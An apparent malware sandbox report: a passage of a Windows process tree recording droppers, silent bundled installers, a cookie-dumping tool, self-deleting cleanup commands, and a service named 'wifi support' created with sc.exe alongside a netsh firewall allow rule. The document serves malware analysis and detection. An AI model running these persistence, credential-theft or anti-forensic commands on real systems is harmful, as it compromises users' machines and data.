                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          PID:4716
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:2476
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3505.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                            3⤵
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:1180
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3505.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3505.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4396
                                                                                                                                                                • C:\Users\Admin\AppData\Local\3b8f9b07-1cc9-4b72-bf0d-dd80b48bc14f\build2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\3b8f9b07-1cc9-4b72-bf0d-dd80b48bc14f\build2.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4932
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\3b8f9b07-1cc9-4b72-bf0d-dd80b48bc14f\build2.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\3b8f9b07-1cc9-4b72-bf0d-dd80b48bc14f\build2.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    PID:5540
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3b8f9b07-1cc9-4b72-bf0d-dd80b48bc14f\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:4952
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /im build2.exe /f
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5936
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          timeout /t 6
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:3420
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3583.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3583.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4692
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3769.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3769.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:4496
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3F59.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3F59.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:764
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4006.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4006.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            PID:6136
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4314.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4314.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2916
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\43FF.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\43FF.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4376
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-9DGIJ.tmp\43FF.tmp
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-9DGIJ.tmp\43FF.tmp" /SL5="$901D8,172303,88576,C:\Users\Admin\AppData\Local\Temp\43FF.exe"
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:4072
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-VG1G6.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-VG1G6.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                3⤵
                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:5300
                                                                                                                                                                • C:\Program Files\Windows Defender Advanced Threat Protection\CKZBMKUDXD\irecord.exe
                                                                                                                                                                  "C:\Program Files\Windows Defender Advanced Threat Protection\CKZBMKUDXD\irecord.exe" /VERYSILENT
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5692
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-BC6U7.tmp\irecord.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-BC6U7.tmp\irecord.tmp" /SL5="$30256,5808768,66560,C:\Program Files\Windows Defender Advanced Threat Protection\CKZBMKUDXD\irecord.exe" /VERYSILENT
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:2248
                                                                                                                                                                      • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:2136
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1c-161d9-713-44099-93b4a94736779\Lulaesaejada.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1c-161d9-713-44099-93b4a94736779\Lulaesaejada.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    PID:2356
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bc-439ee-5d9-0d884-3ee053120b369\Faevanofylae.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\bc-439ee-5d9-0d884-3ee053120b369\Faevanofylae.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5724
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tnk04u03.pia\GcleanerEU.exe /eufive & exit
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4580
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1swkq42.uxx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3016
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjtde0eu.02u\ifhwwyy.exe & exit
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5452
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xjtde0eu.02u\ifhwwyy.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\xjtde0eu.02u\ifhwwyy.exe
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                PID:3300
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:156
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4668
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxurab4k.ooj\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4484
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xxurab4k.ooj\Setup3310.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xxurab4k.ooj\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3556
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-5FT8T.tmp\Setup3310.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-5FT8T.tmp\Setup3310.tmp" /SL5="$3029E,138429,56832,C:\Users\Admin\AppData\Local\Temp\xxurab4k.ooj\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          PID:5268
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HATJS.tmp\Setup.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HATJS.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:5668
                                                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:4168
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:5896
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:6412
                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:6820
                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                            taskkill /im RunWW.exe /f
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:4372
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:6264
                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:5388
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-AGPBG.tmp\MediaBurner.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-AGPBG.tmp\MediaBurner.tmp" /SL5="$203FC,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:4240
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3D49R.tmp\JFHGSFGSIUGFSUIG.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3D49R.tmp\JFHGSFGSIUGFSUIG.exe" /S /UID=burnerch1
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:5668
                                                                                                                                                                                                              • C:\Program Files\Windows Security\VBTWARWRVY\ultramediaburner.exe
                                                                                                                                                                                                                "C:\Program Files\Windows Security\VBTWARWRVY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:6876
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-S3C2D.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-S3C2D.tmp\ultramediaburner.tmp" /SL5="$2043C,281924,62464,C:\Program Files\Windows Security\VBTWARWRVY\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    PID:6896
                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                        PID:7124
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7b-c4336-287-ecbad-17708c1333d0b\Nibywuwasae.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7b-c4336-287-ecbad-17708c1333d0b\Nibywuwasae.exe"
                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                      PID:6976
                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                        dw20.exe -x -s 2224
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                          PID:1332
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\40-2bb67-c47-3a5b3-4cbf6208c4e6c\SHanusuwype.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\40-2bb67-c47-3a5b3-4cbf6208c4e6c\SHanusuwype.exe"
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:5260
                                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:5580
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-75HIM.tmp\LabPicV3.tmp
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-75HIM.tmp\LabPicV3.tmp" /SL5="$30410,448783,365056,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:4300
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-BE6BR.tmp\758____Dawn.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-BE6BR.tmp\758____Dawn.exe" /S /UID=lab214
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            PID:3828
                                                                                                                                                                                                                            • C:\Program Files\Reference Assemblies\NEOOFCKOXL\prolab.exe
                                                                                                                                                                                                                              "C:\Program Files\Reference Assemblies\NEOOFCKOXL\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                PID:6968
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-GE4VJ.tmp\prolab.tmp
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-GE4VJ.tmp\prolab.tmp" /SL5="$1046E,575243,216576,C:\Program Files\Reference Assemblies\NEOOFCKOXL\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  PID:7044
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a0-07c1a-ad2-fc0bf-91a0478d7e3e1\Poxylurimae.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a0-07c1a-ad2-fc0bf-91a0478d7e3e1\Poxylurimae.exe"
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:7052
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                    dw20.exe -x -s 2032
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                      PID:6504
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\c4-ecc96-901-1bd93-d112d2b9d4746\Sunaruwaeci.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\c4-ecc96-901-1bd93-d112d2b9d4746\Sunaruwaeci.exe"
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:7132
                                                                                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                  PID:4708
                                                                                                                                                                                                                                • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:424
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8901431.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8901431.exe"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:4636
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5891838.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5891838.exe"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                        PID:3016
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\8317152.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\8317152.exe"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:5420
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r25mpjpu.zwd\google-game.exe & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\r25mpjpu.zwd\google-game.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\r25mpjpu.zwd\google-game.exe
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    PID:4380
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:4520
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\03l4dk1t.mto\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h4a5j4y4.zac\toolspab1.exe & exit
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\h4a5j4y4.zac\toolspab1.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\h4a5j4y4.zac\toolspab1.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:5368
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\h4a5j4y4.zac\toolspab1.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\h4a5j4y4.zac\toolspab1.exe
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                            PID:2384
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4885.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4885.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:2880
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4360
                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4520
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\54CA.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\54CA.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2544
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\54CA.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\54CA.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:5032
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 1232
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:5896
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 664
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          PID:308
                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\57C9.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\57C9.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                        PID:5292
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\woqmzizr\
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4100
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ekvgynht.exe" C:\Windows\SysWOW64\woqmzizr\
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4216
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" create woqmzizr binPath= "C:\Windows\SysWOW64\woqmzizr\ekvgynht.exe /d\"C:\Users\Admin\AppData\Local\Temp\57C9.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1460
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" description woqmzizr "wifi internet conection"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:5180
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start woqmzizr
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4112
                                                                                                                                                                                                                                                    • C:\Users\Admin\byvtfqft.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\byvtfqft.exe" /d"C:\Users\Admin\AppData\Local\Temp\57C9.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4720
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jjksytvh.exe" C:\Windows\SysWOW64\woqmzizr\
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5416
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" config woqmzizr binPath= "C:\Windows\SysWOW64\woqmzizr\jjksytvh.exe /d\"C:\Users\Admin\byvtfqft.exe\""
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2196
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start woqmzizr
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5296
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4364
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
